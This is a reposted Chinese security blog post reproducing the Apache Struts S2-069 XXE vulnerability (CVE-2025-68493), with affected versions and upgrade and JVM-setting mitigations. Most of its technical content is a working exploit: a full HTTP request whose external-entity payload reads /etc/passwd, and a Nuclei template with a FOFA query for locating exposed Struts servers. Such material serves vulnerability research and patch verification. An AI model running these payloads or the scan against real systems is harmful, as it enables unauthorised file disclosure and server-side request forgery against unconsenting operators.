文章总结: 本文分析ApacheStrutsS2-069XXE漏洞,因XWork组件未严格验证XML导致,影响多个版本。攻击者可利用此漏洞读取文件或进行SSRF攻击。文档提供了具体的复现Payload、NucleiPOC及官方升级或JVM配置修复方案,具备较高实操价值。 综合评分: 89 文章分类: 漏洞分析,漏洞POC,WEB安全,漏洞预警
【漏洞复现】Apache Struts S2-069 XXE漏洞 CVE-2025-68493
原创
YGnight YGnight
night安全
2026年1月16日 08:04 四川
公众号新规只对常读和星标的公众号才能展示大图推送,建议大家把公众号“night安全”设为星标,否则可能就看不到啦!
免责声明
night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞描述
Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 XWork 组件在解析 XML 配置时,未对 XML 进行严格的验证和安全配置,导致存在 XML 外部实体注入 (XXE) 漏洞。攻击者可以构造恶意的 XML 实体,从而实现任意文件读取、拒绝服务 (DoS) 或服务端请求伪造 (SSRF)。
官方通告:
https://cwiki.apache.org/confluence/display/WW/S2-069
影响版本
Struts 2.0.0 至 2.3.37Struts 2.5.0 至 2.5.33Struts 6.0.0 至 6.1.0
漏洞复现
POST/struts2-xml-parser/xmlParserNoDtdParseHTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/143.0.0.0Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencoded
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>
NUCLEI POC
id: CVE-2025-68493-Struts-S2-069-XXEinfo: name: Apache_Struts_S2-069_XXE漏洞_CVE-2025-68493 author: night安全 severity: high description: description reference: - https:// metadata: verified: true max-request: 1 fofa-query: body="Struts" tags: Strutshttp: - raw: - |- @timeout: 30s POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root> matchers-condition: and matchers: - type: status status: - 200 - type: word words: - 'root:x'
修复建议
官方已推送更新版本,受影响用户可以升级至Apache Struts 6.1.1 或更高版本。
临时修复方案:1.使用自定义SAXParserFactory:将xwork.saxParserFactory= 设置为 默认禁用外部实体的自定义工厂类2. 定义 JVM 级别配置 :配置 JVM 默认的 XML 解析器,通过 系统属性禁用外部实体(设置为空字符串以阻止所有协议):-Djavax.xml.accessExternalDTD=""-Djavax.xml.accessExternalSchema=""-Djavax.xml.accessExternalStylesheet=""
扫码关注
获得更多资讯
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:night安全 YGnight YGnight《【漏洞复现】Apache Struts S2-069 XXE漏洞 CVE-2025-68493》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论